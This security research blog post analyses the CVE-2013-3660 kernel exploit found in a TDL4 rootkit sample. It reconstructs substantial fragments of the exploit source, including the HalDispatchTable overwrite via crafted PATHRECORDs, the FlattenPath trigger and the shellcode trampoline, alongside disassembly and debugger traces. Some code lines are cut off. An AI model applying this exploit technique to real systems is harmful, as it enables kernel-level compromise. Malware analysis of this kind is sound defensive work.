As a wise man once said, there’s never a dull moment in the security industry. While the world was talking about the recent IE zero-day doing the rounds, we encountered a variant of the infamous TDL4 rootkit (MD5 = 0e35e0e63fc208873792dd0b7afa90e7) that was rumored to use kernel exploit code made public earlier this year. We would like to reiterate that Bromium Labs had earlier warned that kernel exploits are a huge problem for a lot of security products.
We reverse engineered the TDL4 malware sample and extracted the exploit code. To our surprise, we discovered that the public assumption is not entirely true: there are some crucial differences between the public code and the TDL4 version. Unlike its public counterpart, this exploit takes advantage of the CVE-2013-3660 vulnerability in a more straightforward manner. Before diving into the article, we recommend reading the detailed analysis of the vulnerability and familiarizing yourself with the public exploit code.
Now let’s go through the exploitation steps used in the TDL4 sample. We restored the source code of the exploit and, where applicable, named the variables after their counterparts in the public exploit.
Before the actual exploitation, the TDL4 exploit resolves the necessary routines and addresses, such as NtQueryIntervalProfile and HalDispatchTable. To trigger the payload, the exploit requires a chunk of data that is both a valid pointer and a valid sequence of opcodes. The TDL4 authors used the same trick as the public exploit but changed the opcodes slightly (this routine is referred to below as DispatchRedirect):
jmp dword ptr [ebp+0x40]
inc eax
jmp dword ptr [ebp+0x40]
inc ecx
jmp dword ptr [ebp+0x40]
inc edx
jmp dword ptr [ebp+0x40]
inc ebx
jmp dword ptr [ebp+0x40]
inc esi
…
This sequence of instructions can be represented as an array of 4-byte numbers: 0x404065FF, 0x414065FF, 0x424065FF, etc. The exploit then makes the first doubleword a valid pointer by calling VirtualAlloc:
MEM_COMMIT | MEM_RESERVE,
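The double reading of these bytes can be checked with a short Python sketch. It is our illustration, not part of the sample: it packs the first three instruction pairs from the listing and reads them back as little-endian doublewords. The 64 KB rounding in the last step is an assumption about the usual Windows allocation granularity, and the names `code`, `dwords` and `region_base` are ours.

```python
import struct

# Opcode bytes for the first three instruction pairs of the listing:
# FF 65 40 = jmp dword ptr [ebp+0x40]; 40 / 41 / 42 = inc eax / ecx / edx
code = bytes([0xFF, 0x65, 0x40, 0x40,
              0xFF, 0x65, 0x40, 0x41,
              0xFF, 0x65, 0x40, 0x42])

# Read the same bytes as three little-endian 32-bit values.
dwords = list(struct.unpack("<3I", code))

# Assumption: reservations are rounded down to a 64 KB boundary.
ALLOCATION_GRANULARITY = 0x10000
region_base = dwords[0] & ~(ALLOCATION_GRANULARITY - 1)

print([hex(d) for d in dwords])
print(hex(region_base))
```

Under that assumption, the first doubleword rounds down to the region base address quoted in the text.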
The VirtualAlloc call commits the memory starting at 0x40400000, making the opcode sequence 0xFF 0x65 0x40 0x40 a valid pointer. After that, the exploit sets up three instances of the PATHRECORD structure. This is the main difference from the public exploit code:
ExploitRecordExit = (PPATHRECORD) *DispatchRedirect;
ExploitRecordExit->next = NULL;
ExploitRecordExit->prev = NULL;
ExploitRecordExit->flags = 1;
ExploitRecordExit->count = 0;
ExploitRecord.next = ExploitRecordExit;
ExploitRecord.prev = (PPATHRECORD) &HalDispatchTable;
ExploitRecord.flags = 0x11;
ExploitRecord.count = 4;
PathRecord = VirtualAlloc(NULL, 0x30,
memset(PathRecord, 0x90, 0x30);
PathRecord->next = &ExploitRecord;
PathRecord->prev = NULL;
PathRecord->flags = 0;
At this point we have the following layout:
The PATHRECORD instances are organized in such a way that, when the vulnerability is triggered, nt!HalDispatchTable+0x4 is patched with the address of ExploitRecordExit. Let’s look at the details of the vulnerability. If we put a write breakpoint on nt!HalDispatchTable+0x4, the program will pause in the middle of pprFlattenRec:
kd> ba w 1 nt!HalDispatchTable+0x4
kd> g
Breakpoint 0 hit
win32k!EPATHOBJ::pprFlattenRec+0x60
Tracing the program flow back, we can see that pprFlattenRec creates a new PATHRECORD using win32k!EPATHOBJ::newpathrec and stores it in ESI. The ExploitRecord (which we control) is placed in EDI:
…
mov esi,dword ptr [ebp-4] ; ESI = NewPathRec
…
mov edi,dword ptr [ebp+8] ; EDI = ExploitRecord
mov eax,dword ptr [edi+4] ; EAX = ExploitRecord.prev
mov dword ptr [esi+4],eax ; NewPathRec.prev = ExploitRecord.prev
…
After some manipulation of the count and flags members, the following code is executed:
…
mov eax, dword ptr [esi+4] ; EAX = HalDispatchTable+4
mov dword ptr [eax],esi ; Patch HalDispatchTable+4!
…
At this point HalDispatchTable+4 contains the address of NewPathRec. The next pointer of NewPathRec is initialized to zero here, and later in the function it receives the next pointer of ExploitRecord, i.e. ExploitRecordExit:
…
mov edi, dword ptr[edi] ; EDI = ExploitRecord.next, i.e. ExploitRecordExit
mov dword ptr[esi], edi ; NewPathRec.next = 0x404065FF
…
So HalDispatchTable+4 points at a valid sequence of opcodes. This condition allows us to trigger the shellcode by calling NtQueryIntervalProfile, which at some point calls nt!HalDispatchTable+4.
Now let’s look at how the vulnerability condition is triggered. Similar to the public exploit, the TDL4 variant generates a huge number of Point objects:
for(PointNum = 0; PointNum < 0x7C80; PointNum++)
Points[PointNum].x = (ULONG)(PathRecord)>>4;
Points[PointNum].y = (ULONG)(PathRecord)>>4;
PointTypes[PointNum] = 4;
Next, it enters the 5-step loop, where the actual exploitation occurs. First, it draws the curves using the Points array and creates a compatible device context:
if(hdc == NULL)
PolyDraw(Device, Points, PointTypes, 0x1F2);
PolyDraw(Device, Points, PointTypes, 0x1E3);
hdc = CreateCompatibleDC(Device);
Now that the curves are drawn, it calls the vulnerable function FlattenPath. Before that, however, it creates some memory pressure (by calling CauseFailure()) and then cleans up the created objects.
if( !PolyDraw(hdc, Points, PointTypes, PointNum*0x1F2) )
lpAddress = VirtualAlloc(NULL, 5,
MEM_COMMIT | MEM_RESERVE,
*lpAddress = 0xE9;
*(DWORD *)(lpAddress+1) = (DWORD)(ShellCode) - (DWORD)(lpAddress) - 5;
VirtualFree(lpAddress, 0, 0x8000);
hdc = NULL;
The lpAddress variable is a buffer used as a trampoline to jump to the shellcode. The exploit writes 0xE9 followed by [ShellCodeAddress - lpAddress - 5], which encodes a “jmp ShellCode” instruction. The shellcode execution is triggered using NtQueryIntervalProfile. At this moment nt!HalDispatchTable+0x4 points at 0x404065FF, which, translated to processor instructions, gives us jmp [ebp+0x40], inc eax. The jump leads to the shellcode trampoline, which in turn launches the actual shellcode.
The CauseFailure function repeatedly calls CreateCompatibleBitmap for the in-memory device context. RegionSize is a global variable initialized to 0.
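The "minus 5" in the trampoline comes from how x86 encodes a near relative jump: the 32-bit displacement is measured from the end of the 5-byte instruction, not from its start. A minimal Python sketch of that arithmetic follows. It is our illustration, and the addresses and function names in it are hypothetical rather than taken from the sample.

```python
import struct

def encode_jmp_rel32(src: int, dst: int) -> bytes:
    """Encode 'jmp dst' placed at address src (opcode E9 + rel32)."""
    # The displacement is relative to the next instruction, src + 5.
    disp = (dst - src - 5) & 0xFFFFFFFF
    return b"\xE9" + struct.pack("<I", disp)

def decode_jmp_rel32(src: int, insn: bytes) -> int:
    """Recover the jump target from a 5-byte E9 instruction at src."""
    assert len(insn) == 5 and insn[0] == 0xE9
    (disp,) = struct.unpack("<i", insn[1:])  # signed displacement
    return (src + 5 + disp) & 0xFFFFFFFF

# Hypothetical addresses, chosen only to show the arithmetic.
trampoline = 0x00200000
target = 0x00401000

insn = encode_jmp_rel32(trampoline, target)
print(insn.hex())
print(hex(decode_jmp_rel32(trampoline, insn)))
```

Decoding the instruction again recovers the original target, which confirms the displacement formula in both directions.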
NumRegion = 0;
hdc = CreateCompatibleDC(NULL);
for(Size=0x400000; Size; Size>>=2)
while(Regions[NumRegion] = CreateCompatibleBitmap(hdc, Size, Size))
Regions = realloc(Regions, RegionSize*4);
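To see how quickly the requested bitmap dimensions shrink, the outer loop can be replayed in isolation. The following Python sketch is our illustration: it only enumerates the Size values produced by the for statement and makes no GDI calls, and the function name `bitmap_sizes` is ours.

```python
def bitmap_sizes(start: int = 0x400000) -> list:
    """Replay 'for (Size = start; Size; Size >>= 2)' and collect each Size."""
    sizes = []
    size = start
    while size:
        sizes.append(size)
        size >>= 2  # each pass divides the dimension by four
    return sizes

sizes = bitmap_sizes()
print(len(sizes), [hex(s) for s in sizes])
```

Each pass asks for a Size x Size bitmap, so the loop steps from very large requests down to a 1 x 1 bitmap in a dozen iterations.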
Then Cleanup simply removes all the objects created:
Altogether, this provides a remarkably stable way to run the payload in kernel space. We observed almost 100% stability for this exploit on Windows 7+; however, crashes are still possible, especially with repeated use. The TDL4 sample makes two attempts to exploit the system, but in most cases one is enough.
In short, this version of the CVE-2013-3660 exploit embedded in TDL4 is far more lethal than the public exploit code, and further exploitation of this issue is likely.